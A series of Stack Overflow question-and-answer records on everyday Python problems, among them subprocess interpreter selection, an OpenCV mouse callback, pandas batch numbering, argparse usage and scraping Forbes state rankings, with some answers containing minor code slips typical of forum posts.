I want to run a script using a venv python~3.9 from a subprocess call of another application that uses python3.6. However the imported libraries are wrong and from the site-packages of 3.6 version. How can I modify the subprocess call to load the correct libraries i.e from the venv(3.9 version)
p = Popen([process_name, parameters_l], stdin=PIPE, stdout=PIPE, stderr=PIPE)
I have tried using the cwd and also changing the working directory via os.chdir however that doesn't seem to work. Furthermore I tried to run activat.bat from the venv, but the issue persists.
A:
You should use an absolute path to that venv like /path/to/venv/bin/python3.9
A:
This is my example.
example.py
this code show python version you run.
import sys
print("version {}".format(sys.version))
traverse_python.sh
this code traverses various python versions to show what version runs the code.
you can change the process_name to the python version you want to use.
import time
import subprocess, os
pythoninterpretor = ['/usr/local/bin/python3.10', '/usr/local/bin/python3.11']
for i in pythoninterpretor:
process_name = i
parameters = 'example.py'
p = subprocess.Popen([process_name, parameters])
time.sleep(10)
my results
FYI, the result won't change even if you explicitly use another python version in shebang in the script.
version 3.10.8 (main, Oct 13 2022, 10:17:43) [Clang 14.0.0 (clang-1400.0.29.102)]
version 3.11.0 (main, Oct 25 2022, 14:13:24) [Clang 14.0.0 (clang-1400.0.29.202)]
In your case,
python_interpretor = '/absolute/path/env/python3.9'
p = Popen([python_interpretor, process_name, parameters_l], stdin=PIPE, stdout=PIPE, stderr=PIPE)
and you need to replace /absolute/path/env/python3.9 with your ideal version's path.
| How to avoid loading wrong libraries when using a subprocess.Popen() from a python script to run a venv? | I want to run a script using a venv python~3.9 from a subprocess call of another application that uses python3.6. However the imported libraries are wrong and from the site-packages of 3.6 version. How can I modify the subprocess call to load the correct libraries i.e from the venv(3.9 version)
p = Popen([process_name, parameters_l], stdin=PIPE, stdout=PIPE, stderr=PIPE)
I have tried using the cwd and also changing the working directory via os.chdir however that doesn't seem to work. Furthermore I tried to run activat.bat from the venv, but the issue persists.
| [
"You should use an absolute path to that venv like /path/to/venv/bin/python3.9\n",
"This is my example.\nexample.py\nthis code show python version you run.\nimport sys \nprint(\"version {}\".format(sys.version))\n\ntraverse_python.sh\nthis code traverses various python versions to show what version runs the code.\nyou can change the process_name to the python version you want to use.\nimport time\nimport subprocess, os\n\npythoninterpretor = ['/usr/local/bin/python3.10', '/usr/local/bin/python3.11']\n\nfor i in pythoninterpretor:\n process_name = i\n parameters = 'example.py'\n p = subprocess.Popen([process_name, parameters])\n time.sleep(10)\n\nmy results\nFYI, the result won't change even if you explicitly use another python version in shebang in the script.\nversion 3.10.8 (main, Oct 13 2022, 10:17:43) [Clang 14.0.0 (clang-1400.0.29.102)]\nversion 3.11.0 (main, Oct 25 2022, 14:13:24) [Clang 14.0.0 (clang-1400.0.29.202)]\n\n\nIn your case,\npython_interpretor = '/absolute/path/env/python3.9'\np = Popen([python_interpretor, process_name, parameters_l], stdin=PIPE, stdout=PIPE, stderr=PIPE)\n\nand you need to replace /absolute/path/env/python3.9 with your ideal version's path.\n"
] | [
0,
0
] | [] | [] | [
"loadlibrary",
"python",
"subprocess"
] | stackoverflow_0074600714_loadlibrary_python_subprocess.txt |
Q:
How to make a python application that detects a color and when detected presses a button on the keyboard?
I am trying to write an application that constantly checks for a color and when detected, presses the e button once.
import pyautogui
import time
color = (1, 72, 132)
def clicker():
while True:
x, y = pyautogui.position()
pixelColor = pyautogui.screenshot().getpixel((x, y))
if pixelColor == color:
pyautogui.press('e')
def main():
while True:
clicker()
main()
I only got this but it does not work at all.
A:
To get a tuple of RGB colors at the current mouse position I use this
pixel = pyautogui.pixel(*pyautogui.position())
| How to make a python application that detects a color and when detected presses a button on the keyboard? | I am trying to write an application that constantly checks for a color and when detected, presses the e button once.
import pyautogui
import time
color = (1, 72, 132)
def clicker():
while True:
x, y = pyautogui.position()
pixelColor = pyautogui.screenshot().getpixel((x, y))
if pixelColor == color:
pyautogui.press('e')
def main():
while True:
clicker()
main()
I only got this but it does not work at all.
| [
"To get a tuple of RGB colors at the current mouse position I use this\npixel = pyautogui.pixel(*pyautogui.position())\n\n"
] | [
0
] | [] | [] | [
"action",
"detection",
"python"
] | stackoverflow_0074602233_action_detection_python.txt |
Q:
Spectrochempy Unable to Find "pint.unit" -- Module Not Found Error
I am trying to install spectrochempy (https://www.spectrochempy.fr/stable/gettingstarted/install/install_win.html) via conda on Windows 10. I am able to follow the instructions without an error message; it is only when trying to verify the installation that I get an error message. The full text of the error message is attached below.
Question: How do I make sure the missing packages are installed and which steps can I take to ensure a smooth installation?
Full error message:
from spectrochempy import *
---------------------------------------------------------------------------
ModuleNotFoundError Traceback (most recent call last)
<ipython-input-1-eda726baf6bc> in <cell line: 1>()
----> 1 from spectrochempy import *
~\anaconda3\lib\site-packages\spectrochempy\__init__.py in <module>
57 # import the main api
58
---> 59 from spectrochempy import api
60 from spectrochempy.api import * # noqa: F401
61
~\anaconda3\lib\site-packages\spectrochempy\api.py in <module>
86 # ------------------------------------------------------------------
87 # import the core api
---> 88 from . import core
89 from .core import * # noqa: F403, F401, E402
90
~\anaconda3\lib\site-packages\spectrochempy\core\__init__.py in <module>
29 # ======================================================================================================================
30
---> 31 from ..utils import pstr # noqa: E402
32 import logging
33 import inspect
~\anaconda3\lib\site-packages\spectrochempy\utils\__init__.py in <module>
28 from .print import *
29 from .file import *
---> 30 from .jsonutils import *
31 from .misc import *
32 from .packages import *
~\anaconda3\lib\site-packages\spectrochempy\utils\jsonutils.py in <module>
18 import numpy as np
19
---> 20 from spectrochempy.core.units import Quantity, Unit
21
22 __all__ = ["json_serialiser", "json_decoder"]
~\anaconda3\lib\site-packages\spectrochempy\core\units\__init__.py in <module>
10 """
11
---> 12 from .units import * # noqa: F403, F401, E402
~\anaconda3\lib\site-packages\spectrochempy\core\units\units.py in <module>
30
31
---> 32 from pint.unit import UnitsContainer, Unit, UnitDefinition
33 from pint.quantity import Quantity
34 from pint.formatting import siunitx_format_unit
ModuleNotFoundError: No module named 'pint.unit'
What I've tried:
0. "restart PC"
1. "conda update conda"
C:\WINDOWS\system32>conda update conda
Collecting package metadata (current_repodata.json): done
Solving environment: done
#All requested packages already installed.
Retrieving notices: ...working... done
2. "conda install pint" / "conda update pint"
C:\WINDOWS\system32>conda install pint
Collecting package metadata (current_repodata.json): done
Solving environment: done
#All requested packages already installed.
Retrieving notices: ...working... done
Note: I can run "In [1]: from pint import *" without a problem but "In [2]: from spectrochempy import *" will still claim "ModuleNotFoundError: No module named 'pint.unit'"
3. Re-install Python
I've uninstalled each instance of python I could find in "add or remove programs", then, I deleted "C:\Users\USERNAME\AppData\Local\Programs\Python"; lastly, I removed python from my PATH. After all of that, I installed a fresh python 3.9.13 using Anaconda.
A:
For Future Reference: The solution was to downgrade pint 0.20 -> 0.19
This has turned out to be a bug in the spectrochempy code. There is a thread on github (https://github.com/spectrochempy/spectrochempy/issues/490) which alleges this issue is already solved, however, this was still an issue for me. I used pip to do this which may not have been best practice but worked for me in this case:
pip uninstall pint
pip install pint=0.19.2
| Spectrochempy Unable to Find "pint.unit" -- Module Not Found Error | I am trying to install spectrochempy (https://www.spectrochempy.fr/stable/gettingstarted/install/install_win.html) via conda on Windows 10. I am able to follow the instructions without an error message; it is only when trying to verify the installation that I get an error message. The full text of the error message is attached below.
Question: How do I make sure the missing packages are installed and which steps can I take to ensure a smooth installation?
Full error message:
from spectrochempy import *
---------------------------------------------------------------------------
ModuleNotFoundError Traceback (most recent call last)
<ipython-input-1-eda726baf6bc> in <cell line: 1>()
----> 1 from spectrochempy import *
~\anaconda3\lib\site-packages\spectrochempy\__init__.py in <module>
57 # import the main api
58
---> 59 from spectrochempy import api
60 from spectrochempy.api import * # noqa: F401
61
~\anaconda3\lib\site-packages\spectrochempy\api.py in <module>
86 # ------------------------------------------------------------------
87 # import the core api
---> 88 from . import core
89 from .core import * # noqa: F403, F401, E402
90
~\anaconda3\lib\site-packages\spectrochempy\core\__init__.py in <module>
29 # ======================================================================================================================
30
---> 31 from ..utils import pstr # noqa: E402
32 import logging
33 import inspect
~\anaconda3\lib\site-packages\spectrochempy\utils\__init__.py in <module>
28 from .print import *
29 from .file import *
---> 30 from .jsonutils import *
31 from .misc import *
32 from .packages import *
~\anaconda3\lib\site-packages\spectrochempy\utils\jsonutils.py in <module>
18 import numpy as np
19
---> 20 from spectrochempy.core.units import Quantity, Unit
21
22 __all__ = ["json_serialiser", "json_decoder"]
~\anaconda3\lib\site-packages\spectrochempy\core\units\__init__.py in <module>
10 """
11
---> 12 from .units import * # noqa: F403, F401, E402
~\anaconda3\lib\site-packages\spectrochempy\core\units\units.py in <module>
30
31
---> 32 from pint.unit import UnitsContainer, Unit, UnitDefinition
33 from pint.quantity import Quantity
34 from pint.formatting import siunitx_format_unit
ModuleNotFoundError: No module named 'pint.unit'
What I've tried:
0. "restart PC"
1. "conda update conda"
C:\WINDOWS\system32>conda update conda
Collecting package metadata (current_repodata.json): done
Solving environment: done
#All requested packages already installed.
Retrieving notices: ...working... done
2. "conda install pint" / "conda update pint"
C:\WINDOWS\system32>conda install pint
Collecting package metadata (current_repodata.json): done
Solving environment: done
#All requested packages already installed.
Retrieving notices: ...working... done
Note: I can run "In [1]: from pint import *" without a problem but "In [2]: from spectrochempy import *" will still claim "ModuleNotFoundError: No module named 'pint.unit'"
3. Re-install Python
I've uninstalled each instance of python I could find in "add or remove programs", then, I deleted "C:\Users\USERNAME\AppData\Local\Programs\Python"; lastly, I removed python from my PATH. After all of that, I installed a fresh python 3.9.13 using Anaconda.
| [
"For Future Reference: The solution was to downgrade pint 0.20 -> 0.19\nThis has turned out to be a bug in the spectrochempy code. There is a thread on github (https://github.com/spectrochempy/spectrochempy/issues/490) which alleges this issue is already solved, however, this was still an issue for me. I used pip to do this which may not have been best practice but worked for me in this case:\npip uninstall pint\n\npip install pint=0.19.2 \n\n"
] | [
0
] | [] | [] | [
"pint",
"python"
] | stackoverflow_0074466054_pint_python.txt |
Q:
Better way to generate Postgresql covered index with SQLAlchemy and Alembic
Since Postgresql 11 covered index have been introduced. We create a covered index using INCLUDE keyword like this:
CREATE INDEX index_name ON table_name(indexed_col_name) INCLUDE (covered_col_name);
Here the official postgresql doc for more details.
I have done some research on Google but did not find how to implement this feature with SQLAlchemy and include it in the migration file generated by Alembic. Any proposition, idea, doc link will be appreciated.
A:
Index("my_index", table.c.x, postgresql_include=['y'])
It's in the postgres-specific part of the documentation
See also: issue, commit
| Better way to generate Postgresql covered index with SQLAlchemy and Alembic | Since Postgresql 11 covered index have been introduced. We create a covered index using INCLUDE keyword like this:
CREATE INDEX index_name ON table_name(indexed_col_name) INCLUDE (covered_col_name);
Here the official postgresql doc for more details.
I have done some research on Google but did not find how to implement this feature with SQLAlchemy and include it in the migration file generated by Alembic. Any proposition, idea, doc link will be appreciated.
| [
"Index(\"my_index\", table.c.x, postgresql_include=['y'])\n\nIt's in the postgres-specific part of the documentation\nSee also: issue, commit\n"
] | [
0
] | [] | [] | [
"alembic",
"postgresql",
"python",
"sqlalchemy"
] | stackoverflow_0073546270_alembic_postgresql_python_sqlalchemy.txt |
Q:
opencv mouse callback isn't being triggered
Take a look at this function:
def showImage(im):
def printColor(event, x, y, flag, params):
if event == cv2.EVENT_LBUTTONDOWN:
print(im[x,y])
sys.exit(1)
tag = "image"
cv2.setMouseCallback(tag, printColor)
cv2.imshow(tag, im)
while True:
if 'q' == chr(cv2.waitKey() & 255):
cv2.destroyAllWindows()
break
It's supposed to display an image and print the pixel at mouse position when clicked. But for some reason the callback isn't being triggered. How can I get this code working?
A:
For setMouseCallback to work you will need to create window object first.
This can be done either by calling imshow before setting mouse callback, or by creating it with cv2.namedWindow()
A:
@You may try the following code
import cv2
def function1(event, x, y, flags, param):
if event==cv2.EVENT_LBUTTONDOWN:
print(input_img[x, y])
input_img = cv2.imread(r'D:\personal
data\316817146_6028126817205901_1035125390140549057_n.jpg') # get image
#named window
cv2.namedWindow('new window')
#show the image in the window
cv2.imshow('new window', input_img)
#call setMouseCallback()
cv2.setMouseCallback('new window', function1)
while True:
if cv2.waitKey(1) and 0xFF==ord('q'):
break
cv2.detroyAllWindows()
| opencv mouse callback isn't being triggered | Take a look at this function:
def showImage(im):
def printColor(event, x, y, flag, params):
if event == cv2.EVENT_LBUTTONDOWN:
print(im[x,y])
sys.exit(1)
tag = "image"
cv2.setMouseCallback(tag, printColor)
cv2.imshow(tag, im)
while True:
if 'q' == chr(cv2.waitKey() & 255):
cv2.destroyAllWindows()
break
It's supposed to display an image and print the pixel at mouse position when clicked. But for some reason the callback isn't being triggered. How can I get this code working?
| [
"For setMouseCallback to work you will need to create window object first.\nThis can be done either by calling imshow before setting mouse callback, or by creating it with cv2.namedWindow()\n",
"@You may try the following code\nimport cv2\n\ndef function1(event, x, y, flags, param):\n\n if event==cv2.EVENT_LBUTTONDOWN:\n\n\n print(input_img[x, y])\n\n\ninput_img = cv2.imread(r'D:\\personal \ndata\\316817146_6028126817205901_1035125390140549057_n.jpg') # get image\n#named window\ncv2.namedWindow('new window')\n#show the image in the window\ncv2.imshow('new window', input_img)\n\n#call setMouseCallback()\ncv2.setMouseCallback('new window', function1)\n\nwhile True:\n\n if cv2.waitKey(1) and 0xFF==ord('q'):\n\n break\n\n\ncv2.detroyAllWindows()\n\n"
] | [
3,
0
] | [] | [] | [
"callback",
"cv2",
"opencv",
"python"
] | stackoverflow_0052946499_callback_cv2_opencv_python.txt |
Q:
What is the meaning of [:, 1:] after np.genfromtxt()?
I am struggeling with python now. i'm trying this script.
I am sure this is a very common syntax in python, but it is so generic I can't find any explanation that make sense to me.
Can you help me to understand the meaning of [:, 0] and [:, 1:] in the following lines of code?
syms = np.genfromtxt('people.csv', dtype=str, delimiter=',')[:, 0]
X = np.genfromtxt('people.csv', dtype=object, delimiter=',')[:, 1:]
people.csv
| | | | |
|-------|---|---|-|
|Marc | .2| -2|A|
|Martine|-.2| 0|A|
|Max | .2| .2|A|
|Maxine | .2| .1|A|
A:
That's using slice notation to extract specific rows and columns from the dataset.
[:, 0] means all rows, column 0.
[:, 1:] means all rows, columns 1 through n (all columns except 0).
See Understanding slicing for a good explanation of Python slicing notation.
| What is the meaning of [:, 1:] after np.genfromtxt()? | I am struggeling with python now. i'm trying this script.
I am sure this is a very common syntax in python, but it is so generic I can't find any explanation that make sense to me.
Can you help me to understand the meaning of [:, 0] and [:, 1:] in the following lines of code?
syms = np.genfromtxt('people.csv', dtype=str, delimiter=',')[:, 0]
X = np.genfromtxt('people.csv', dtype=object, delimiter=',')[:, 1:]
people.csv
| | | | |
|-------|---|---|-|
|Marc | .2| -2|A|
|Martine|-.2| 0|A|
|Max | .2| .2|A|
|Maxine | .2| .1|A|
| [
"That's using slice notation to extract specific rows and columns from the dataset.\n[:, 0] means all rows, column 0.\n[:, 1:] means all rows, columns 1 through n (all columns except 0).\nSee Understanding slicing for a good explanation of Python slicing notation.\n"
] | [
1
] | [] | [] | [
"numpy",
"python",
"square_bracket"
] | stackoverflow_0074602285_numpy_python_square_bracket.txt |
Q:
Python: Share a python object instance between child processes
I want to share a python class instance between my child processes that are created with the subprocess.Popen
How can I do it ? What arguments should I use of the Popen?
A:
You can share a pickle over a named pipe.
| Python: Share a python object instance between child processes | I want to share a python class instance between my child processes that are created with the subprocess.Popen
How can I do it ? What arguments should I use of the Popen?
| [
"You can share a pickle over a named pipe.\n"
] | [
0
] | [] | [] | [
"multiprocessing",
"process",
"python",
"subprocess"
] | stackoverflow_0074602221_multiprocessing_process_python_subprocess.txt |
Q:
Draw a line that goes outside the image
I need to draw a line that start from a coordinate in the image and if it goes outside the image it will keep drawing starting from the opposite side like the videogame "Snake".
I don't know how to perform this with Python without using libraries.
Example:
after opening an image
I create a for loop taking the commands where to go
if x==(commands value)
x+=1
image[y][x] == (100,100,100)
(100,100,100) is the color
but I don't know how to tell Python when the line goes out of range to go back to the opposite side. For example if the picture is wide 100 pixel and i start from position of x 90 after 10 pixel it will be at the edge of the picture and if it keeps the for loop it will return me 'out of index', I want to give my function the option to go back to position x 0 when it arrives at position of x 101.
thanks
A:
Change it to:
image[y % image_height ][x % image_width] = (100, 100, 100)
Modulo operator : https://realpython.com/python-modulo-operator/
| Draw a line that goes outside the image | I need to draw a line that start from a coordinate in the image and if it goes outside the image it will keep drawing starting from the opposite side like the videogame "Snake".
I don't know how to perform this with Python without using libraries.
Example:
after opening an image
I create a for loop taking the commands where to go
if x==(commands value)
x+=1
image[y][x] == (100,100,100)
(100,100,100) is the color
but I don't know how to tell Python when the line goes out of range to go back to the opposite side. For example if the picture is wide 100 pixel and i start from position of x 90 after 10 pixel it will be at the edge of the picture and if it keeps the for loop it will return me 'out of index', I want to give my function the option to go back to position x 0 when it arrives at position of x 101.
thanks
| [
"Change it to:\nimage[y % image_height ][x % image_width] = (100, 100, 100)\nModulo operator : https://realpython.com/python-modulo-operator/\n"
] | [
1
] | [] | [] | [
"python"
] | stackoverflow_0074602458_python.txt |
Q:
how to install pip install python-telegram-bot?
how to install pip install python-telegram-bot in pycharm. please help me i get this error msg -
$ : The term '$' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ $ pip install python-telegram-bot
+ ~
+ CategoryInfo : ObjectNotFound: ($:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
i try but not done someone help me out
| how to install pip install python-telegram-bot? | how to install pip install python-telegram-bot in pycharm. please help me i get this error msg -
$ : The term '$' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ $ pip install python-telegram-bot
+ ~
+ CategoryInfo : ObjectNotFound: ($:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
i try but not done someone help me out
| [] | [] | [
"There should be a \"Python Packages\" on the bottom slidebar. It's a convenient way to install packages.\n"
] | [
-1
] | [
"python"
] | stackoverflow_0074602418_python.txt |
Q:
is there a way to have parameters be executed in random order in python cli?
i have a program that takes 3 parameters: volume, weight, and model_path. Currently, i have:
volume = int(args[0])
weight = int(args[1])
model_path = args[2]
so i have to execute it like this: python3 example.py 713 382 model.pkl. I want to be able to do it like this: python3 example.py --weight=500 --volume=437 --model=model.pkl, but in any order (so python3 example.py --volume=3100 --model=model.pkl --weight=472).
I tried
volume = int(args["--volume"])
weight = int(args["--weight"])
model_path = args["--model"]
and it said args could only be type slice or int, not string.
A:
Ignoring the idea of reimplementing the argparse module, just use that module. For example,
import argparse
p = argparse.ArgumentParser()
p.add_argument('--volume', type=int)
p.add_argument('--weight', type=int)
p.add_argument('--model')
args = p.parse_args()
The result will be an instance of argparse.Namespace, which is just a very simple object with attributes associated with each argument you defined. For example, if you specify --weight=500 or --weight 500, then args.weight == 500.
| is there a way to have parameters be executed in random order in python cli? | i have a program that takes 3 parameters: volume, weight, and model_path. Currently, i have:
volume = int(args[0])
weight = int(args[1])
model_path = args[2]
so i have to execute it like this: python3 example.py 713 382 model.pkl. I want to be able to do it like this: python3 example.py --weight=500 --volume=437 --model=model.pkl, but in any order (so python3 example.py --volume=3100 --model=model.pkl --weight=472).
I tried
volume = int(args["--volume"])
weight = int(args["--weight"])
model_path = args["--model"]
and it said args could only be type slice or int, not string.
| [
"Ignoring the idea of reimplementing the argparse module, just use that module. For example,\nimport argparse\n\np = argparse.ArgumentParser()\np.add_argument('--volume', type=int)\np.add_argument('--weight', type=int)\np.add_argument('--model')\n\nargs = p.parse_args()\n\nThe result will be an instance of argparse.Namespace, which is just a very simple object with attributes associated with each argument you defined. For example, if you specify --weight=500 or --weight 500, then args.weight == 500.\n"
] | [
1
] | [] | [] | [
"command_line_interface",
"list",
"python",
"python_3.x"
] | stackoverflow_0074602341_command_line_interface_list_python_python_3.x.txt |
Q:
Python code to have batch numbers within a value in a column in dataframe
I have a dataframe like this
Name Age
0 U 20
1 U 20
2 U 20
3 U 18
4 I 45
5 I 68
6 I 8
7 D 7
8 D 6
9 I 89
and I want to have batch size (say 3) and I want to display another column, which increments the batch number staring from 1 and with batch size being repetitive within a particular column value U, I , D in Name column, after the batch size the batch number should increment by 1(within a particular Name) the output should look like
Name Age Batch
0 U 20 1
1 U 20 1
2 U 20 1
3 U 18 2
4 I 45 3
5 I 68 3
6 I 8 3
7 D 7 4
8 D 6 4
9 I 89 5
any suggestions or references on how to do this ?
I have this piece of code which kinda does the job, but it does not consider the Name column and then increment.
resu['B'] = np.divmod(np.arange(len(resu)),3)[0]+1
The output which I got is like this and this is not desired output as it is not considering Name column
index Name Age B
0 4 I 45 1
1 5 I 68 1
2 6 I 8 1
3 9 I 89 2
4 0 U 20 2
5 1 U 20 2
6 2 U 20 3
7 3 U 18 3
8 7 D 7 3
9 8 D 6 4
Is there any other solution perhaps ?
A:
You can use:
N = 3
# group successive values
group = df['Name'].ne(df['Name'].shift()).cumsum()
# restart group every N times
df['Batch'] = (df.groupby(group)
.cumcount().mod(N)
.eq(0).cumsum()
)
Output:
Name Age Batch
0 U 20 1
1 U 20 1
2 U 20 1
3 U 18 2
4 I 45 3
5 I 68 3
6 I 8 3
7 D 7 4
8 D 6 4
9 I 89 5
| Python code to have batch numbers within a value in a column in dataframe | I have a dataframe like this
Name Age
0 U 20
1 U 20
2 U 20
3 U 18
4 I 45
5 I 68
6 I 8
7 D 7
8 D 6
9 I 89
and I want to have batch size (say 3) and I want to display another column, which increments the batch number staring from 1 and with batch size being repetitive within a particular column value U, I , D in Name column, after the batch size the batch number should increment by 1(within a particular Name) the output should look like
Name Age Batch
0 U 20 1
1 U 20 1
2 U 20 1
3 U 18 2
4 I 45 3
5 I 68 3
6 I 8 3
7 D 7 4
8 D 6 4
9 I 89 5
any suggestions or references on how to do this ?
I have this piece of code which kinda does the job, but it does not consider the Name column and then increment.
resu['B'] = np.divmod(np.arange(len(resu)),3)[0]+1
The output which I got is like this and this is not desired output as it is not considering Name column
index Name Age B
0 4 I 45 1
1 5 I 68 1
2 6 I 8 1
3 9 I 89 2
4 0 U 20 2
5 1 U 20 2
6 2 U 20 3
7 3 U 18 3
8 7 D 7 3
9 8 D 6 4
Is there any other solution perhaps ?
| [
"You can use:\nN = 3\n\n# group successive values\ngroup = df['Name'].ne(df['Name'].shift()).cumsum()\n\n# restart group every N times\ndf['Batch'] = (df.groupby(group)\n .cumcount().mod(N)\n .eq(0).cumsum()\n )\n\nOutput:\n Name Age Batch\n0 U 20 1\n1 U 20 1\n2 U 20 1\n3 U 18 2\n4 I 45 3\n5 I 68 3\n6 I 8 3\n7 D 7 4\n8 D 6 4\n9 I 89 5\n\n"
] | [
3
] | [] | [] | [
"dataframe",
"group_by",
"numpy",
"pandas",
"python"
] | stackoverflow_0074601971_dataframe_group_by_numpy_pandas_python.txt |
Q:
Web scrape of forbes website using requests-html
I'm trying to scrape the list from https://www.forbes.com/best-states-for-business/list/#tab:overall
import requests_html
session= requests_html.HTMLSession()
r = session.get("https://www.forbes.com/best-states-for-business/list/#tab:overall")
r.html.render()
body=r.text.find('#list-table-body')
print(body)
This returns -1, not the table content. How can I get the actual table content?
A:
Data is loaded dynamically from external source via API and You can grab the required data using requests module only then store via pandas DataFrame.
import pandas as pd
import requests
headers = {'user-agent':'Mozilla/5.0'}
url = 'https://www.forbes.com/ajax/list/data?year=2019&uri=best-states-for-business&type=place'
r= requests.get(url,headers=headers)
df = pd.DataFrame(r.json())
print(df)
Output:
position rank name uri ... regulatoryEnvironment economicClimate growthProspects lifeQuality
0 1 1 North Carolina nc ... 1 13 13 16
1 2 2 Texas tx ... 21 4 1 15
2 3 3 Utah ut ... 6 8 7 9
3 4 4 Virginia va ... 3 20 24 1
4 5 5 Florida fl ... 7 3 5 18
5 6 6 Georgia ga ... 9 7 11 23
6 7 7 Tennessee tn ... 4 11 14 29
7 8 8 Washington wa ... 29 6 8 30
8 9 9 Colorado co ... 19 2 4 21
9 10 10 Idaho id ... 8 10 2 24
10 11 11 Nebraska ne ... 2 28 36 19
11 12 12 Indiana in ... 5 25 25 7
12 13 13 Nevada nv ... 14 14 6 48
13 14 14 South Dakota sd ... 13 39 20 28
14 15 15 Minnesota mn ... 16 16 27 3
15 16 16 South Carolina sc ... 17 15 12 39
16 17 17 Iowa ia ... 11 36 35 10
17 18 18 Arizona az ... 18 12 3 35
18 19 19 Massachusetts ma ... 37 5 15 4
19 20 20 Oregon or ... 36 9 9 38
20 21 21 Wisconsin wi ... 10 19 37 8
21 22 22 Missouri mo ... 25 26 18 17
22 23 23 Delaware de ... 42 37 19 43
23 24 24 Oklahoma ok ... 15 31 33 31
24 25 25 New Hampshire nh ... 32 21 22 22
25 26 26 North Dakota nd ... 22 45 26 42
26 27 27 Pennsylvania pa ... 35 23 40 12
27 28 28 New York ny ... 34 18 21 14
28 29 29 Ohio oh ... 26 22 44 2
29 30 30 Montana mt ... 28 35 17 45
30 31 31 California ca ... 40 1 10 27
31 32 32 Wyoming wy ... 12 49 23 36
32 33 33 Arkansas ar ... 20 33 39 41
33 34 34 Maryland md ... 41 27 29 26
34 35 35 Michigan mi ... 22 17 41 13
35 36 36 Kansas ks ... 24 32 42 32
36 37 37 Illinois il ... 39 30 45 11
37 38 38 Kentucky ky ... 33 41 34 25
38 39 39 New Jersey nj ... 49 29 30 5
39 40 40 Alabama al ... 27 38 31 44
40 41 41 Rhode Island ri ... 44 40 32 20
41 42 42 Mississippi ms ... 30 46 47 37
42 43 43 Connecticut ct ... 43 42 48 6
43 44 44 Maine me ... 48 34 28 34
44 45 45 Vermont vt ... 45 43 38 33
45 46 46 Louisiana la ... 47 47 46 47
46 47 47 Hawaii hi ... 38 24 49 40
47 48 48 New Mexico nm ... 46 44 15 49
48 49 49 West Virginia wv ... 50 48 50 46
49 50 50 Alaska ak ... 31 50 43 50
[50 rows x 15 columns]
| Web scrape of forbes website using requests-html | I'm trying to scrape the list from https://www.forbes.com/best-states-for-business/list/#tab:overall
import requests_html
session= requests_html.HTMLSession()
r = session.get("https://www.forbes.com/best-states-for-business/list/#tab:overall")
r.html.render()
body=r.text.find('#list-table-body')
print(body)
This returns -1, not the table content. How can I get the actual table content?
| [
"Data is loaded dynamically from external source via API and You can grab the required data using requests module only then store via pandas DataFrame.\nimport pandas as pd\nimport requests\n\nheaders = {'user-agent':'Mozilla/5.0'}\nurl = 'https://www.forbes.com/ajax/list/data?year=2019&uri=best-states-for-business&type=place'\nr= requests.get(url,headers=headers)\n\ndf = pd.DataFrame(r.json())\nprint(df)\n\nOutput:\n position rank name uri ... regulatoryEnvironment economicClimate growthProspects lifeQuality\n0 1 1 North Carolina nc ... 1 13 13 16 \n1 2 2 Texas tx ... 21 4 1 15 \n2 3 3 Utah ut ... 6 8 7 9 \n3 4 4 Virginia va ... 3 20 24 1 \n4 5 5 Florida fl ... 7 3 5 18 \n5 6 6 Georgia ga ... 9 7 11 23 \n6 7 7 Tennessee tn ... 4 11 14 29 \n7 8 8 Washington wa ... 29 6 8 30 \n8 9 9 Colorado co ... 19 2 4 21 \n9 10 10 Idaho id ... 8 10 2 24 \n10 11 11 Nebraska ne ... 2 28 36 19 \n11 12 12 Indiana in ... 5 25 25 7 \n12 13 13 Nevada nv ... 14 14 6 48 \n13 14 14 South Dakota sd ... 13 39 20 28 \n14 15 15 Minnesota mn ... 16 16 27 3 \n15 16 16 South Carolina sc ... 17 15 12 39 \n16 17 17 Iowa ia ... 11 36 35 10 \n17 18 18 Arizona az ... 18 12 3 35 \n18 19 19 Massachusetts ma ... 37 5 15 4 \n19 20 20 Oregon or ... 36 9 9 38 \n20 21 21 Wisconsin wi ... 10 19 37 8 \n21 22 22 Missouri mo ... 25 26 18 17 \n22 23 23 Delaware de ... 42 37 19 43 \n23 24 24 Oklahoma ok ... 15 31 33 31 \n24 25 25 New Hampshire nh ... 32 21 22 22 \n25 26 26 North Dakota nd ... 22 45 26 42 \n26 27 27 Pennsylvania pa ... 35 23 40 12 \n27 28 28 New York ny ... 34 18 21 14 \n28 29 29 Ohio oh ... 26 22 44 2 \n29 30 30 Montana mt ... 28 35 17 45 \n30 31 31 California ca ... 40 1 10 27 \n31 32 32 Wyoming wy ... 12 49 23 36 \n32 33 33 Arkansas ar ... 20 33 39 41 \n33 34 34 Maryland md ... 41 27 29 26 \n34 35 35 Michigan mi ... 22 17 41 13 \n35 36 36 Kansas ks ... 24 32 42 32 \n36 37 37 Illinois il ... 39 30 45 11 \n37 38 38 Kentucky ky ... 33 41 34 25 \n38 39 39 New Jersey nj ... 49 29 30 5 \n39 40 40 Alabama al ... 27 38 31 44 \n40 41 41 Rhode Island ri ... 44 40 32 20 \n41 42 42 Mississippi ms ... 30 46 47 37 \n42 43 43 Connecticut ct ... 43 42 48 6 \n43 44 44 Maine me ... 48 34 28 34 \n44 45 45 Vermont vt ... 45 43 38 33 \n45 46 46 Louisiana la ... 47 47 46 47 \n46 47 47 Hawaii hi ... 38 24 49 40 \n47 48 48 New Mexico nm ... 46 44 15 49 \n48 49 49 West Virginia wv ... 50 48 50 46 \n49 50 50 Alaska ak ... 31 50 43 50 \n\n[50 rows x 15 columns]\n\n"
] | [
1
] | [] | [] | [
"python",
"python_requests_html",
"web_scraping"
] | stackoverflow_0074600929_python_python_requests_html_web_scraping.txt |
Q:
check the boolean value of json Python
Hello I am pretty new working with AWS and SF I am trying to send information and I need to check if the list of json I am checking the information.
I have the next json list:
here...b'[{
"id": "xxxx",
"success": true,
"errors": []
},
{
"id": "yyyy",
"success": true,
"errors": []
}
]'
and in my lambda I do the next check:
response = requests.request("PATCH", url, headers=headers, data=body)
print('here...'+str(response.content))
if response.status_code == 200:
for iResult in response.content.b["success"]:
if iResult["success"] == false:
raise Exception('Error. Check SF size fields...')
I want to make sure that every 'success' in every json is equals to True. And if it is false to raise an Exception. So I made a loop to iterate over each json but the problem I have is that I do not know how to access the json correctly. What is confusing me is the " b' " in the json I print.
